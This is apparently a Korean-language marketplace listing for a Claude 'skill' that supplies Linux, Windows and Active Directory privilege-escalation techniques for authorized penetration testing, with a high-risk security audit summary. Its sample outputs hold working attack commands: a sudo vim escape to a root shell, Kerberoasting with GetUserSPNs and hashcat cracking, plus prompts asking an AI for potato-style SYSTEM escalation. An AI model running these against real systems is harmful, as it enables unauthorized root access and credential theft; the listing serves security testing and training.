privilege-escalation-methods
권한 상승 기술 실행
보안 전문가는 승인된 침투 테스트를 위해 신뢰할 수 있는 참고 자료가 필요합니다. 이 스킬은 Linux 및 Windows 환경에 대한 권한 상승 기술을 ���절한 컨텍스트와 선행 조건과 함께 제공합니다.
스킬 ZIP 다운로드
Claude에서 업로드
설정 → 기능 → 스킬 → 스킬 업로드로 이동
토글을 켜고 사용 시작
테스트해 보기
"privilege-escalation-methods" 사용 중입니다. 손상된 Linux 호스트에서 sudo 권한 열거
예상 결과:
- Run: sudo -l
- Review listed commands that can be executed without password
- GTFOBins와 교차 참조하여 악용 기술 확인
- Example output shows: (root) NOPASSWD: /usr/bin/vim
- Exploitation: sudo vim -c ':!/bin/bash' spawns root shell
"privilege-escalation-methods" 사용 중입니다. Active Directory에서 Kerberoastable 서비스 티켓 요청
예상 결과:
- Run: GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.10.1 -request
- Tool requests TGS tickets for accounts with SPNs set
- Output contains NTLM hashes suitable for offline cracking
- Crack with: hashcat -m 13100 hashes.txt wordlist.txt
- Successful crack reveals service account plaintext password
보안 감사
높은 위험This skill documents offensive security techniques for authorized penetration testing. Static analysis detected 125 patterns including shell execution, credential harvesting, and privilege escalation commands. All findings are TRUE POSITIVES representing documented attack techniques. The skill is educational reference material but contains actionable exploit instructions that require careful handling. Recommended for security professionals only with appropriate warnings.
심각한 문제 (2)
높은 위험 문제 (3)
중간 위험 문제 (3)
낮은 위험 문제 (1)
위험 요인
🌐 네트워크 접근 (4)
📁 파일 시스템 액세스 (3)
감지된 패턴
품질 점수
만들 수 있는 것
침투 테스터 익스플로잇 후 활동
초기 foothold를 확보한 보안 컨설턴트가 고객에게 권한 상승 위험을 입증해야 합니다.
레드 팀 도메인 위협
레드 팀 운영자가 참여 중 Active Directory 공격 체인에 대한 참고 자료가 필요합니다.
보안 연구 교육
탐지 기능을 개선하기 위해 공격 기술을 연구하는 방어 보안 연구원
이 프롬프트를 사용해 보세요
I have a low-privilege shell on a Linux target. Show me enumeration commands to identify potential privilege escalation vectors including sudo permissions, SUID binaries, and writable cron jobs.
I found that my user can run vim as root without a password. Provide the GTFOBins technique to escalate to root using this misconfiguration.
I have domain user credentials and need to identify service accounts vulnerable to Kerberoasting. Show me the Impacket and Rubeus commands to request and crack service tickets.
I have SeImpersonatePrivilege on a Windows host. Explain how to use SweetPotato or SharpImpersonation to escalate to SYSTEM level access.
모범 사례
- 소유하지 않은 시스템에서 테스트하기 전에 항상 서면 승인을 받으십시오.
- 모든 악용 단계를 문서화하고 참여 완료 후 아티팩트를 정리하십시오.
- 이러한 ��술을 학습하고 테스트하기 위해 격리된 랩 환경을 사용하십시오.
피하기
- 명시적인 고객 승인 없이 프로덕션 시스템에서 권한 상승을 ��도하지 마십시오.
- 문서화된 승인 없이 지속성 메커니즘이나 백도어를 남기지 마십시오.
- 대상 시스템에 미치는 영향을 ��해하지 못한 상태에서 자동화된 도구를 실행하지 마십시오.
자주 묻는 질문
이 스킬을 사용하는 것이 합법적인가요?
이러한 기술을 위해 특수 도구가 필요한가요?
일부 기술이 도메인 필수로 표시되는 이유는 무엇인가요?
sudo -l에 암호가 필요하면 어떻게 하나요?
어떤 기술이 작동할지 어떻게 알 수 있나요?
버그 바운티 프로그램에서 이러한 기술을 사용해야 하나요?
개발자 세부 정보
작성자
sickn33라이선스
MIT
리포지토리
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/privilege-escalation-methods참조
main
파일 구조
📄 SKILL.md